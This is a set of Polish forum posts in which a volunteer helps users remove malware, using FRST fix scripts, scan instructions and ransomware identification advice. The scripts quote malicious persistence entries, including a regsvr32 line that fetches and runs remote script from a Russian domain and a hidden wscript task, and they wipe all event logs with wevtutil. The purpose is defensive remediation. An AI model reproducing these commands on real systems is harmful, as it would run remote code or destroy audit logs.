Miszel03

Tak, system wygląda na wolny od złośliwego oprogramowania. Czy możemy przejść do finalizacji tematu?

Nie ma za bardzo co odkrywać na tym pendrive. Jeśli chodzi o te pliki / lokalizacje: 2018-04-03 12:14 - 2018-04-02 23:37 - 000302989 ____A [ED1D83917FC0D34CF27879BC506E2A60] () E:\ \Do wydruku\form_ods_nowy.pdf 2018-04-04 11:23 - 2018-04-04 10:48 - 000090678 ____A [7B7222E95B9E0879D4625C6BF80AB12A] () E:\do wydruku\17964780237.pdf 2018-04-03 12:15 - 2018-04-03 12:15 - 000000000 ____D [00000000000000000000000000000000] () E:\do wydruku to powinieneś je widzieć. Przekopiuj teraz bezpiecznie na pulpit folder E:\do wydruku i E:\ \Do wydruku\form_ods_nowy.pdf i sformatuj pendrive (wymazania całej zawartości). Jeśli będę dodatkowe pytania / wątpliwości - zadaj je w pierwszej kolejności. Te drobne detekcje adware (skan Malwarebytes) w przeglądarce Mozilla FireFox możesz zadać do kasacji (czyli wykonaj ponownie skan i zaznacz akcje Usuń). Reszta wygląda już w porządku, wszystko zostało pomyślnie wykonane.

Sugeruję przeinstalować tą grę i sprawdzić efekty. Z tego co widzę na forum pomocy technicznej Steam brak swoistego rozwiązania dla tego problemu. To nie wygląda na problem infekcji, więc temat przenoszę do działu Software. Do wykonania drobne zabiegi w tym m.in: kasacja martwych wpisów / podejrzanego zadania w Harmonogramie zadań / czyszczenie lokalizacji tymczasowych (w tym kosza). 1. Przez Panel Sterownia sugeruję odinstalować lewy aktywator pakietu Office: KMSpico. Opis: KLIK. 2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: ShellIconOverlayIdentifiers: [00asw] -> {472083B0-C522-11CF-8763-00608CC02F24} => -> Brak pliku ContextMenuHandlers1: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> Brak pliku ContextMenuHandlers1: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Brak pliku ContextMenuHandlers6: [WinRAR] -> [CC]{B41DB860-64E4-11D2-9906-E49FADC173CA} => -> Brak pliku ContextMenuHandlers6: [WinRAR32] -> [CC]{B41DB860-8EE4-11D2-9906-E49FADC173CA} => -> Brak pliku Task: {9FD5A587-AA82-4CA7-AE3A-88BE4BBC1216} - System32\Tasks\Optimize Thumbnail Cache Files => wscript.exe //nologo //E:jscript //B "C:\ProgramData\InstallShield\Update\isuspm.ini" HKU\S-1-5-21-877183501-1986155994-4149436259-1001\...\MountPoints2: {3b51431f-9b05-11e7-9c93-1c1b0d985ab2} - "E:\HiSuiteDownLoader.exe" HKU\S-1-5-21-877183501-1986155994-4149436259-1001\...\MountPoints2: {c1f54f6f-9af0-11e7-9c8d-806e6f6e6963} - "D:\Run.exe" HKLM Group Policy restriction on software: %systemroot%\system32\mrt.exe HKU\S-1-5-18\...\Run: [] => [X] Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę w tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 3. Kontrolnie przeskanuj całościowo system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

Firma ESET wydała ostatnie (The Last Windows XP Security White Paper) opracowanie bezpieczeństwa dla systemu Windows XP: Windows XP Security The Last Windows XP Security White Paper

W raportach brak oznak infekcji. Nie zrobiłeś źle blokując zagrożenie. Ważne, że ścieżka znowu ta sama. Widocznie NoCoin nie blokuję pewnej strony, która ładuję koparkę. Spróbuj również blokady / kontroli wykonywania skryptów JS za pomocą rozszerzenia NoScript Security Suite.

Posty dot. prośby o raporty stąd kasuję, gdyż te zostały poprawnie dostarczone. Infekcja utworzyła folder symulujący jakoby nie miały nazwy i to jedyne co aktualnie pokazuje na tym dysku log USBFix: [13/03/2018 -13:01:08 | D ] E:\ [03/04/2018 - 00:01:36 | RASHD ] E:\Autorun.inf (to szczepionka od USBFix) Ten szkodnik przenosi do tego folderu poprawne dane z pendrive (on powinien być ukryty, ale pewnie USBFix zdjął atrybuty). Twoje pliki w tym folderze mogą się znajdować, tylko Ty ich po prostu nie widzisz - są ukryte pod atrybutem HS. Prześwietlę ten folder w skrypcie i zobaczę czy coś tam jest. Jeżeli będą tam dane to ściągnę atrybuty i powinieneś je zobaczyć. Jeśli jednak danych nie będzie, nic więcej nie da się zrobić. Komentarz w spoilerze. W systemie aktywna infekcja uruchamiana przez autostart (ale nie jestem w stanie określić konkretnej nazwy). Oprócz tego zajmuję się kasacją martwych wpisów / skrótów / resztek po oprogramowaniu (m.in po produktach Google). Przeprowadź następujące działania (omawiany pendrive musi być podpięty do portu USB w czasie wykonywania skryptu): 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: C:\Users\KOREK\Desktop\Dokumenty\Gry\Hearthstone.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\ipla.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\iTunes.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\Origin.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\RollerCoaster Tycoon 3.lnk C:\Users\KOREK\Desktop\Dokumenty\Gry\µTorrent.lnk C:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\to\Elf\Skrót do loader.lnk C:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\Elfik\Skrót do loader.lnk C:\Users\KOREK\Desktop\bb\PZŁS\ \Do Tibii\Elf\Skrót do loader.lnk HKLM-x32\...\RunOnce: [] => [X] HKLM\...\Policies\Explorer: [TaskbarNoNotification] 0 HKLM\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Policies\Explorer: [TaskbarNoNotification] 0 HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Policies\Explorer: [HideSCAHealth] 0 HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\Run: [COM+] => regsvr32 /s /n /u /i:hxxp://server2.aserdefa.ru/restore.xml scrobj.dll HKU\S-1-5-21-3533474029-2419083652-3193758770-1000\...\MountPoints2: {b41bcb9f-634f-11e7-a5ad-c018850ed8ce} - E:\AutoRun.exe GroupPolicy: Ograniczenia FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku] C:\Program Files (x86)\Google C:\Users\KOREK\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google VirusTotal: C:\Windows\System32\scrobj.dll Folder: E:\ Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę w tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Całościowo przeskanuj system za pomocą Malwarebytes AntiMalware. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Prasuję się tutaj na pierwszy rzut oka problem sprzętowy urządzenia wejściowego - myszy. Czy masz możliwość sprawdzenia jak zachowywać się będzie inna mysz podłączona do tego komputera? Sprawdź również inny port USB.

Proszę o ścieżkę pliku, którego dotyczyła ta detekcja. Dodatkowo dostarcz nowy komplet raportów FRST.

Z tego komunikatu nie wiele wynika, padłeś ofiarą infekcji szyfrującej dane i żądającej za nie okupu. W celu identyfikacji wariantu infekcji szyfrującej (pozwoli ocenić czy istnieje dekoder) proszę przesłać zaszyfrowany plik do analizy w usłudze ID Ransomware. Wynik dostarcz w postaci zrzutu ekranu / zdjęcia. Uzupełnij też wymagana raporty systemowe.

Przypominam o zmianie haseł we wszystkich serwisach logowania. Sugeruję uruchomić również bezpieczną weryfikację dwuetapową na najważniejszych kontach logowania (jeśli możliwe). Jest mi bardzo miło, że mogłem pomóc! Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Na jakim systemie występuje ten problem? Podejrzewam, że będzie trzeba wdrożyć FIX adresujący klucz zasadniczy Kosza z jego danymi (opcje menu kontekstowego, pobór ikony oraz nazwa). Wstępnie spróbuj również wykonać reset katalogu kosza na dysku C (zostaną usunięte z niego wszystkie dane). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CreateRestorePoint: RemoveDirectory: C:\$Recycle.bin Reboot: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). System uruchomi się ponownie, po tej operacji przedstaw wynikowy fixlog.txt. 2. Napisz też jak wygląda sytuacja z koszem po tym zabiegu?

Wprawdzie nie prosiłem o to, ale dobrze to słyszeć. Pisząc Podsumuj obecną sytuację chodzi mi o to, abyś napisał jak zachowuję się teraz komputer?

1. Pierwsze wejście to plik, a drugi folder wygląda na to, że jest pusty, upewnij się i skasuj oba: C:\Users\Kratos\AppData\Roaming\OFSWO C:\Program Files (x86)\Client 2. Podsumuj obecną sytuację.

Katalog: C:\Users\Kratos\AppData\Roaming 2017-01-25 15:18 Monitor Data utworzenia tego katalogu nakłada się właśnie z datą utworzenia szkodnika, którego wykryłem w raportach. To wygląda na spyware, gdyż w katalogu masa zrzutów ekranu i logów. Malwarebytes również potwierdza moje obawy - to definitywnie Trojan.StolenData.D.Generic. Aczkolwiek mam pytanie: czy skan na pewno nie został zatrzymany (widzę, że trwał tylko 49 sekund*)? Po dezynfekcji wymagana prewencyjna zmiana haseł we wszystkich serwisach logowania i koniecznie w bankach. * jeśli skan nie został zatrzymany przejdź dalej: Poprawki i przenoszenie do kwarantanny folderu Monitor (Malwarebytes nie wiedzieć czemu przenosi tylko niektóre elementy z tego folderu), oprócz tego sprawdzam kolejne dwa foldery OFSWO i Client, gdyż ich daty nakładają się idealnie z datami wejścia infekcji. 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CHR HKLM\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton 360\Engine\22.12.1.15\Exts\Chrome.crx CHR HKLM-x32\...\Chrome\Extension: [cjabmdjcfcfdmffimndhafhblfmpjdpe] - C:\Program Files\Norton 360\Engine\22.12.1.15\Exts\Chrome.crx CHR HKLM-x32\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx CHR HKLM\...\Chrome\Extension: [iikflkcanblccfahdhdonehdalibjnif] - hxxps://clients2.google.com/service/update2/crx C:\Users\Kratos\AppData\Roaming\Monitor Folder: C:\Users\Kratos\AppData\Roaming\OFSWO Folder: C:\Program Files (x86)\Client VirusTotal: C:\Users\Kratos\AppData\Roaming\ezpinst.exe Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę w tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 2. Wykonaj kolejny całościowy skan systemu, tym razem za pomocą Zemana AntiMalware Free. Jeśli coś wykryje to niczego nie usuwaj, a dostarcz raport.

Wspomniany folder zostanie oczywiście sprawdzony, ale oprócz niego widoczna jest inna infekcja, która panoszy się w systemie już od przeszło roku. Zajmę się również sprzątaniem resztek po oprogramowaniu (m.in po produktach Google). Zostaną również wyczyszczone lokalizacje tymczasowe (w tym kosz). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: C:\ProgramData\Microsoft\Windows\GameExplorer\{31876D21-6CD3-4CC8-9C31-8ACE51C11C89}\SupportTasks\0\Sieć.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Steam\Steam.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Eidos Interactive\Tomb Raider GOTY Edition\Deinstalacja programu Tomb Raider GOTY Edition.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Eidos Interactive\Tomb Raider GOTY Edition\Tomb Raider GOTY Edition.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks\Fallout 4\Deinstalacja programu Fallout 4.lnk C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Bethesda Softworks\Fallout 4\Fallout 4.lnk C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft\Uplay\Uninstall.lnk C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Ubisoft\Uplay\Uplay.lnk HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\Policies\Explorer: [NoSaveSettings] 0 HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\MountPoints2: G - G:\Autorun.exe HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\MountPoints2: {2e163e10-e235-11e6-8fcf-1c6f65d0a118} - G:\autorun.exe HKU\S-1-5-21-4166491339-2414778801-2949013589-1000\...\MountPoints2: H - H:\setup\rsrc\Autorun.exe Startup: C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIGIOOUbALLd.lnk [2017-01-25] ShortcutTarget: VIGIOOUbALLd.lnk -> C:\Users\Kratos\oOCJdZ7EJTCFoBjC\BPLH.exe (AutoIt Team) C:\Users\Kratos\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VIGIOOUbALLd.lnk C:\Users\Kratos\oOCJdZ7EJTCFoBjC C:\Users\Kratos\AppData\Roaming\BPLH.exe FF Plugin: @microsoft.com/GENUINE -> disabled [brak pliku] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [brak pliku] U3 DfSdkS; Brak ImagePath S3 cmudaxp; system32\drivers\cmudaxp.sys [X] S3 EraserUtilDrv11710; \??\C:\Program Files (x86)\Common Files\Symantec Shared\EENGINE\EraserUtilDrv11710.sys [X] S3 NAVENG; \??\C:\Program Files\Norton 360\NortonData\22.9.1.12\Definitions\SDSDefs\20171202.001\NAVENG.SYS [X] S3 NAVEX15; \??\C:\Program Files\Norton 360\NortonData\22.9.1.12\Definitions\SDSDefs\20171202.001\NAVEX15.SYS [X] C:\Program Files (x86)\Google C:\Users\Kratos\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google Folder: C:\Users\Kratos\AppData\Roaming\monitor CMD: dir /a "C:\Program Files" CMD: dir /a "C:\Program Files (x86)" CMD: dir /a "C:\Program Files\Common Files\System" CMD: dir /a "C:\Program Files (x86)\Common Files\System" CMD: dir /a C:\ProgramData CMD: dir /a C:\Users\Kratos\AppData\Local CMD: dir /a C:\Users\Kratos\AppData\LocalLow CMD: dir /a C:\Users\Kratos\AppData\Roaming Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. 2. Użyj zainstalowanego Malwarebytes Anti-Malware i po aktualizacji wykonaj nim całościowy skan systemu. Jeśli coś zostanie wykryte to niczego nie usuwaj, a dostarcz raport. 3. Zrób nowy log FRST z opcji Skanuj (Scan) wraz z Addition, ale już bez Shortcut. Dołącz też plik fixlog.txt.

Nie mogę otworzyć tego załącznika. Poza tym w instrukcji napisane jest jasno, że wymagane są trzy pliki - FRST, Addition i Shortcut. Proszę o dostarcznie wszystkich trzech, jeśli jest problem z załącznikami to proszę skorzystać z serwisu wklej.org.

Dobrych Świąt wszystkim!

GandCrab Ransomware Help & Support Topic (.GDCB & GDCB-DECRYPT.txt) Pojawił się dekoder dla wersji 1. Sugeruję wypróbować go.

Proszę dostarczyć wymagane przez nas raporty. ComboFix nie jest podstawą diagnostyczną. ComboFix to nie jest narzędzie do "tworzenia loga" (skan jest inwazyjny), tylko bardzo ingerencyjny program, który zgodnie z przyrostkiem w nazwie robi potężny "FIX" oraz modyfikuje system. Do tworzenia logów mamy w rękawie kilka narzędzi nie modyfikujących wcale systemu a produkujących "zestaw podobny do ComboFix".

Chodzi o programy z sekcji aktualizacji istotnych aplikacji w podlinkowanym wyżej temacie. Skoro Windows Update nie wyszukuje nowych aktualizacji to jest OK.

Dostosuj temat do zasad działu. Proszę poczytaj również na temat używania ComboFix - to narzędzie czerwonego alertu, przeznaczone tylko dla osób przeszkolonych do jego używania. Użytkownik samodzielnie nie może go używać.

Cieszę się, że mogłem pomóc. W porządku. Na koniec zastosuj DelFix (kasacja używanych narzędzi) oraz zaktualizuj oprogramowanie zewnętrzne jak i system Windows.

Czy problem z detekcją CoinMiner nadal występuję? Malwarebytes możesz już odinstalować.

Zainstalowane rozszerzenie jest gotowe do użycia. Sekcja konfiguracyjna dostępna jest w panelu Rozszerzeń (CTRL + SHIFT + A) przy przycisku Opcje. Wymagana jest instalacja. Malwarebytes to rekomendowane narzędzie, ale jest bardzo wrażliwe na detekcje typu adware / PUP - pewnie stąd komunikaty bezpieczeństwa na względnie bezpiecznych stronach. Proszę po prostu przy instalacji nie uruchamiać ochrony w czasie rzeczywistym, a wykonać tylko pełne skanowanie i dostarczyć wyniki do analizy (nie podejmować żadnych akcji). Po tych akcjach i tak wspomnę kiedy będzie można odinstalować tą aplikację.

Raporty nie wykazują oznak infekcji. Podobny temat: Infekcja JS/CoinMiner.B. Prawdopodobnie w Twoim przypadku jest podobnie. Po wejściu na stronę ze zintegrowaną koparką kryptowalut JavaScript zostaje wykonany i rozpoczyna się proces wydobycia. Czy jesteś w stanie odtworzyć, przy której konkretnie stronie zostaje wyświetlona detekcja? Twoje rozszerzenie blokujące reklamy uBlock Origin z tego co widzę nie posiada wbudowanego filtra wykrywającego skrypty koparek. Sugeruję więc wyposażyć się dodatkowo w rozszerzenie NoCoin. Przedtem oczywiście ponownie wyczyść ciasteczka i pamięć podręczną przeglądarki. Pozostaje obserwować czy problem ustąpił. Poniżej zadaję sprzątanie resztek po oprogramowaniu (m.in po produktach Google). Zostaną również wyczyszczone lokalizacje tymczasowe (w tym kosz). 1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik tekstowy. Wklej do pliku następującą treść: CloseProcesses: CreateRestorePoint: C:\ProgramData\APRP\ASUSProductReg.url SearchScopes: HKLM -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> DefaultScope {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = SearchScopes: HKLM-x32 -> {0633EE93-D776-472f-A0FF-E1416B8B2E3A} URL = FF Plugin: @microsoft.com/GENUINE -> disabled [No File] FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File] R4 IOMap; \??\C:\Windows\system32\drivers\IOMap64.sys [X] S4 nvvad_WaveExtensible; system32\drivers\nvvad64v.sys [X] C:\Program Files (x86)\Google C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome C:\Users\Artur Machnicki\AppData\Local\Google DeleteKey: HKCU\Software\Google DeleteKey: HKLM\SOFTWARE\Google DeleteKey: HKLM\SOFTWARE\Wow6432Node\Google Powershell: wevtutil el | Foreach-Object {wevtutil cl "$_"} EmptyTemp: Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach. Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt. Przedstaw go. 2. Dla świętego spokoju sugeruję również przeskanować system za pomocą skaner na żądanie np. Malwarebytes AntiMalware.